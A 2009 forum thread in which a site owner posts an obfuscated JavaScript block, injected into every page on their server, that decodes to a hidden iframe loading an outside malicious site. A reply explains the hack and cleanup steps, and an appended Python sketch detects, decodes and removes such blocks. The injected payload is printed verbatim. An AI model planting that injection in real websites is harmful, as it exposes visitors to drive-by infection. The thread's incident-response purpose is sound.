Websites compromised: This code added to all HTML and PHP documents

Discussion in 'Software' started by Phishie, Mar 17, 2009.

  1. Phishie

    Phishie Private E-2

    Hello, I am not sure if this is the right forum. But I thought somebody could help me by just telling me what this code does. My websites went down because this code broke the PHP pages. That's why I decided to inspect the code and I found that the following had been injected into every single PHP and HTML document on my server.

    It's a java code, which I am not familiar with, so if somebody could just tell me what the code does, I'd be very grateful.

    Thanks.

    Code:
    <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,103,103,101,51,61,34,98,111,111,114,34,59,118,97,114,32,119,51,52,53,61,34,109,34,59,118,97,114,32,114,101,54,61,34,97,110,115,106,101,119,101,108,108,101,114,115,46,34,59,118,97,114,32,114,114,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,105,115,39,43,39,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,50,49,50))</script>
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    Moved to the Software Forum.
     
  3. webranger

    webranger Private E-2

    It's a hack. It ended up in my GoDaddy hosting account, but I'm not really sure where it came from. It does exist in at least one other WordPress blog I found hosted by GoDaddy.

    As near as I can tell, it launches a 1 pixel square iframe that calls up a website that could plant a virus, but apparently doesn't. At least not one that's detectable by AVG. It came to my attention because Google Chrome flashed an infection message when I accessed my web site.

    Apparently Kaspersky also detects it.

    I think it may come from the hosting company because it also showed up in the "stats" files, which are not writable by me.

    I changed the secret key in WordPress. I made all of the files in the html directory read-only and I changed all of the account passwords. I have left a few non-public dummy html files in the directory writeable. No re-infection yet, but it took a couple days for the problem to recur last time I cleaned up the mess.

    Cleaning up the problem just required going through all the files and removing the line of JavaScript. An aid to that was the WordPress Exploit Scanner plugin, which is out of date, so you should search for the JavaScript string above and forget the rest of the error messages.

    To save some time you might want to back up your wp-config file (make sure it's clean) and then re-upload a clean copy of WordPress. That will leave you just cleaning your theme and any occasional html files you might have lying around.

    I'll come back here if I get any more info. To make sure you're clean... use Google Chrome, because it does detect the exploit.
     
    Last edited: Mar 25, 2009
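
An added example, not part of any post in this thread: a Python sketch that finds the `eval(String.fromCharCode(...))` script block shown in the first post, decodes the character codes without executing them, and strips the block from file contents. The sample page, the `malicious.example` host and all function names are constructed for illustration.

```python
import re
from pathlib import Path

# The injected pattern: <script ...>eval(String.fromCharCode(n,n,...))</script>
INJECTION = re.compile(
    r"<script[^>]*>\s*eval\(\s*String\.fromCharCode\(([\d,\s]+)\)\s*\)\s*;?\s*</script>",
    re.IGNORECASE,
)

def decode_charcodes(arg_list):
    """Turn '118,97,114' into text; the payload is never executed."""
    return "".join(chr(int(n)) for n in arg_list.split(",") if n.strip())

def collapse_literals(js):
    """Join adjacent '...'+'...' string pieces so split keywords become readable."""
    return re.sub(r"'\s*\+\s*'", "", js)

def scan_text(text):
    """Return the decoded payload of every injected block found in text."""
    return [decode_charcodes(m.group(1)) for m in INJECTION.finditer(text)]

def clean_text(text):
    """Return (text without injected blocks, number of blocks removed)."""
    return INJECTION.subn("", text)

def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Read-only sweep: map each infected file under root to its decoded payloads."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: a page with one injected block pointing at a placeholder host.
PAYLOAD = "document.write('<if'+'rame src=\"http://malicious.example/\" style=\"dis'+'play:none\"></if'+'rame>');"
SAMPLE = (
    '<?php echo "hello"; ?>\n<script type="text/javascript">eval(String.fromCharCode('
    + ",".join(str(ord(c)) for c in PAYLOAD)
    + "))</script>\n<p>page body</p>\n"
)

if __name__ == "__main__":
    for decoded in scan_text(SAMPLE):
        print("decoded:", collapse_literals(decoded))
    cleaned, removed = clean_text(SAMPLE)
    print(removed, "injected block(s) removed")
```

`scan_tree` only reads files; apply `clean_text` to a copy of each hit and diff the result before overwriting anything on the server.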
